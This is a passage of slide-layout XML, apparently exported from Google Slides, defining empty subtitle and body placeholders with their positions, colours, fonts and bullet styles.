                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="242" name="Google Shape;242;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="9404636" y="390031"/>
              <a:ext cx="141300" cy="3045300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="6CADDF"/>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900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Google Shape;243;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1040569" y="1397569"/>
            <a:ext cx="2263200" cy="764100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Google Shape;244;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440456" y="1397569"/>
            <a:ext cx="2263200" cy="764100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Google Shape;245;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5850806" y="1397569"/>
            <a:ext cx="2263200" cy="764100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Google Shape;246;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1018144" y="1899359"/>
            <a:ext cx="2263200" cy="2750100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-285750" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-279400" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-279400" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-304800" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Google Shape;247;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445688" y="1899359"/>
            <a:ext cx="2263200" cy="2750100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-285750" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-279400" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-279400" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-304800" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="Google Shape;248;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5833069" y="1899359"/>
            <a:ext cx="2263200" cy="2750100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-285750" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-279400" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-279400" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-304800" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="Google Shape;249;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
